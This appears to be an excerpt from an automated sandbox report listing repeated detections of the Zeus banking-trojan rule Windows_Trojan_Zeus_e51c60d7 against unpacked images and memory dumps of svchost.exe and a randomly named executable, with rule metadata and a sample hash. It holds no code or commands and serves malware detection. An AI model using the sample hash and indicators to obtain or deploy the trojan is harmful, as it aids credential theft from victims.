      Source: 1.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.a00000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3a80000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.24c2000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2d20000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2601000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2515c00.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2515c00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.a00000.46.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2d20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
